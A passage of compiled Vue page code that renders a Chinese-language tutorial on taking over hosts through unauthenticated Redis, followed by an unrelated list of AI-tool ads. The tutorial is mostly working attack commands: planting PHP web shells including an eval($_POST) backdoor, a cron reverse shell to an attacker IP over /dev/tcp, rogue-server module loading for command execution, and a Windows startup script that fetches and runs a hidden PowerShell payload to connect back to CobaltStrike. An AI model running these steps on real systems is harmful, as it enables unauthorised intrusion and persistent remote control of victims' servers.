number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" \n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br"),e("span",{staticClass:"line-number"},[s._v("10")]),e("br"),e("span",{staticClass:"line-number"},[s._v("11")]),e("br"),e("span",{staticClass:"line-number"},[s._v("12")]),e("br"),e("span",{staticClass:"line-number"},[s._v("13")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1030),alt:"img"}})]),s._v(" "),e("ul",[e("li",[s._v("✅如上则为成功写入SSH密钥文件,攻击机可无需密码远程连接目标主机SSH")])]),s._v(" "),e("h3",{attrs:{id:"webshell"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#webshell"}},[s._v("#")]),s._v(" WebShell")]),s._v(" "),e("p",[s._v("当SSH不允许远程登录时,也可以通过写入 Web目录控制目标主机")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v('┌──(root💀kali)-[~/.ssh]\n└─# redis-cli -h 192.168.0.126 -p 6379\n192.168.0.126:6379> config set dir /var/www/html\nOK\n192.168.0.126:6379> config set dbfilename xxx.php\nOK\n192.168.0.126:6379> set web "\r\n\r\n'),e("span",{pre:!0,attrs:{class:"token php language-php"}},[e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("<?php")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token function"}},[s._v("phpinfo")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(";")]),e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("?>")])]),s._v('\r\n\r\n"\nOK\n192.168.0.126:6379> save\nOK\n')])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br"),e("span",{staticClass:"line-number"},[s._v("10")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1031),alt:"img"}})]),s._v(" "),e("h3",{attrs:{id:"定时任务"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#定时任务"}},[s._v("#")]),s._v(" 定时任务")]),s._v(" "),e("p",[s._v("也可以通过写入定时任务反弹Shell,获取权限")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("攻击机监听端口 ")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("nc -lvvp 9999")]),e("br"),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" set test2 "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.0.140/9999 0>&1\n\n"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dir "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("var")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),s._v("spool"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),s._v("cron\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dbfilename root\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" save\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" \n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1032),alt:"img"}})]),s._v(" "),e("h3",{attrs:{id:"主从复制"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#主从复制"}},[s._v("#")]),s._v(" 主从复制")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("如果当把数据存储在单个Redis的实例中,当读写体量比较大的时候,服务端就很难承受。")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式")]),e("br"),s._v(" "),e("p",[s._v("Redis未授权访问在4.x/5.0.5以前版本,我们可以使用主/从模式加载远程模块,通过动态链接库的方式执行任意命令。")]),s._v(" "),e("p",[s._v("关于漏洞原理请查看"),e("a",{attrs:{href:"https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf",target:"_blank",rel:"noopener noreferrer"}},[s._v("Pavel Toporkov的分享"),e("OutboundLink")],1)]),s.v(" "),e("p",[s.v("漏洞利用脚本: "),e("a",{attrs:{href:"https://github.com/n0b0dyCN/redis-rogue-server",target:"blank",rel:"noopener noreferrer"}},[s.v("n0b0dyCN/redis-rogue-server"),e("OutboundLink")],1)]),s.v(" "),e("div",{staticClass:"language-shell line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-shell"}},[e("code",[s.v("➜ ./redis-rogue-server.py -h\n _ _ ______ _____ \n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" ___ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s.v(""),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" ___ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" / _"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s.v("|")]),s.v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s.v("|")]),s.v("/ / "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v(" ___ "),e("span",{pre:!0,attrs:{class:"token operator"}},[s.v("|")]),s.v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s.v("|")]),s.v("/ / __ _ _ _ ___ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token variable"}},[e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("")]),s._v("--. ___ _ ____ _____ _ __ \n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" // _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v("/ _"),e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("")])]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" / "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" // _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" / _"),e("span",{pre:!0,attrs:{class:"token variable"}},[e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("/ _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("")])]),s._v("--. "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v("/ _ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token string"}},[s._v("'\ \ / / _ \ '")]),s._v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" / "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s.v("\")]),s.v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s.v(""),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v(" / /"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v("/ / / "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(" V / / "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(","),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v("/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v("/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(", "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s._v(","),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s.v("\")]),s.v("/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v("/ "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("\")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v(""),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n / "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" \n "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s.v("/ \n@copyright n0b0dy @ r3kapig\n\nUsage: redis-rogue-server.py "),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),s._v("options"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),s._v("\n\nOptions:\n -h, --help show this "),e("span",{pre:!0,attrs:{class:"token builtin class-name"}},[s._v("help")]),s._v(" message and "),e("span",{pre:!0,attrs:{class:"token builtin class-name"}},[s._v("exit")]),s._v("\n --rhost"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("REMOTE_HOST target "),e("span",{pre:!0,attrs:{class:"token function"}},[s._v("host")]),s._v("\n --rport"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("REMOTE_PORT target redis port, default "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),s._v("\n --lhost"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("LOCAL_HOST rogue server "),e("span",{pre:!0,attrs:{class:"token function"}},[s._v("ip")]),s._v("\n --lport"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("LOCAL_PORT rogue server listen port, default "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("21000")]),s._v("\n --exp"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("EXP_FILE Redis Module to load, default exp.so\n -v, --verbose Show full data stream\nExample\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br"),e("span",{staticClass:"line-number"},[s._v("9")]),e("br"),e("span",{staticClass:"line-number"},[s._v("10")]),e("br"),e("span",{staticClass:"line-number"},[s._v("11")]),e("br"),e("span",{staticClass:"line-number"},[s._v("12")]),e("br"),e("span",{staticClass:"line-number"},[s._v("13")]),e("br"),e("span",{staticClass:"line-number"},[s._v("14")]),e("br"),e("span",{staticClass:"line-number"},[s._v("15")]),e("br"),e("span",{staticClass:"line-number"},[s._v("16")]),e("br"),e("span",{staticClass:"line-number"},[s._v("17")]),e("br"),e("span",{staticClass:"line-number"},[s._v("18")]),e("br"),e("span",{staticClass:"line-number"},[s._v("19")]),e("br"),e("span",{staticClass:"line-number"},[s._v("20")]),e("br"),e("span",{staticClass:"line-number"},[s._v("21")]),e("br"),e("span",{staticClass:"line-number"},[s._v("22")]),e("br")])]),e("div",{staticClass:"language-shell line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-shell"}},[e("code",[s._v("python3 redis-rogue-server.py --rhost "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),s._v(".51.146 --lhost "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),s._v(".51.146 --exp"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("=")]),s._v("exp.so\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1033),alt:"img"}})]),s._v(" "),e("p",[e("img",{attrs:{src:a(1034),alt:"img"}})]),s._v(" "),e("h2",{attrs:{id:"windows-获取权限"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#windows-获取权限"}},[s._v("#")]),s._v(" Windows 获取权限")]),s._v(" "),e("h3",{attrs:{id:"webshell-2"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#webshell-2"}},[s._v("#")]),s._v(" Webshell")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("攻击成功的前提为:需要准确的知道Web目录位置")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("可通过 phpinfo 或者 网站报错得知")]),e("br"),s._v(" "),e("p",[e("img",{attrs:{src:a(1035),alt:"img"}})]),s._v(" "),e("p",[s._v("这里测试的目标路径为:"),e("code",[s._v("C:\phpstudy_pro\WWW")])]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v('192.168.0.123:6379> config set dir C:\phpstudy_pro\WWW\nOK\n192.168.0.123:6379> config set dbfilename shell.php\nOK\n192.168.0.123:6379> set test "'),e("span",{pre:!0,attrs:{class:"token php language-php"}},[e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("<?php")]),s._v(" @"),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("eval")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),e("span",{pre:!0,attrs:{class:"token variable"}},[s._v("$_POST")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),e("span",{pre:!0,attrs:{class:"token string single-quoted-string"}},[s._v("'shell'")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),e("span",{pre:!0,attrs:{class:"token delimiter important"}},[s._v("?>")])]),s._v('"\nOK\n192.168.0.123:6379> save\nOK\n')])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1036),alt:"img"}})]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("成功写入木马,并可连接控制服务器")]),e("br"),s._v(" "),e("p",[e("img",{attrs:{src:a(1037),alt:"img"}})]),s._v(" "),e("h3",{attrs:{id:"启动项"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#启动项"}},[s._v("#")]),s._v(" 启动项")]),s._v(" "),e("p",[s._v("攻击方法与写入Linux启动项相似")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("需要高权限账户")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("Windows 启动项目录为:")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp")]),e("br"),s._v(" "),e("p",[s._v("首先创建 CobaltStrike监听")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("Attacks -> Web Drive-By -> Script Web Delivery")]),e("br"),s._v(" "),e("p",[e("img",{attrs:{src:a(1038),alt:"img"}})]),s._v(" "),e("p",[s._v("生成 Powershell 语句")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("powershell"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("exe "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("nop "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("w hidden "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("c "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v(""IEX ((new-object net.webclient).downloadstring('http://192.168.0.126:6666/a'))"")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[s._v("执行Redis命令写入语句")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dir "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dbfilename cmd"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("bat\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" set x "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\r\n\r\npowershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.126:6666/a'))\"\r\n\r\n"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".123")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" save\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br"),e("span",{staticClass:"line-number"},[s._v("2")]),e("br"),e("span",{staticClass:"line-number"},[s._v("3")]),e("br"),e("span",{staticClass:"line-number"},[s._v("4")]),e("br"),e("span",{staticClass:"line-number"},[s._v("5")]),e("br"),e("span",{staticClass:"line-number"},[s._v("6")]),e("br"),e("span",{staticClass:"line-number"},[s._v("7")]),e("br"),e("span",{staticClass:"line-number"},[s._v("8")]),e("br")])]),e("p",[s._v("当主机重启时就会执行命令上线 CobaltStrike")]),s._v(" "),e("p",[e("img",{attrs:{src:a(1039),alt:"img"}})])],1)}),[],!1,null,null,null);t.default=r.exports}}]);```

Latest Weekly Picks

make ink
make.ink favicon
Weekly Pick

Your AI tattoo generator for pro-grade concepts

make ink
Leo Wade
Sellfy
sellfy.com favicon
Weekly Pick

A code-free online store builder to turn views into revenue. Sell digital products, subscriptions, and merch, without fees or hassle.

Sellfy
Maris
Video To Blog
www.videotoblog.ai favicon
Weekly Pick

Convert videos into awesome blog posts.

Video To BlogSource
Video To Blog
SellerPic
www.sellerpic.ai favicon
Weekly Pick

SellerPic is the all-in-one AI design platform for e-commerce

SellerPicSource
SellerPic
Fast Image AI
fastimage.ai favicon
Weekly Pick

Fast Image AI instantly transforms your photos into stunning styles like Ghibli, Sketch, and Pixar. Effortlessly control image elements and create amazing effects with just one click.

Fast Image AI
Fast AI Team
LinkedInPro
linkedinpro.daisy.so favicon
Weekly Pick

AI-powered tool that transforms casual photos into professional LinkedIn headshots instantly. No photographer needed—just upload and download.

LinkedInPro
Gabriel
Crevas AI
crevas.ai favicon
Weekly Pick

Crevas unifies Veo 3, Sora 2, Nano Banana and more into one intuitive canvas — so filmmakers can script, prompt, and generate cinematic stories without switching tools or losing consistency.

Crevas AI
Spark Alpha
AI Foto Edit
fotominiatur.com favicon
Weekly Pick

AI Foto Edit - Text to Image & Image Edit

AI Foto EditSource
foto miniatur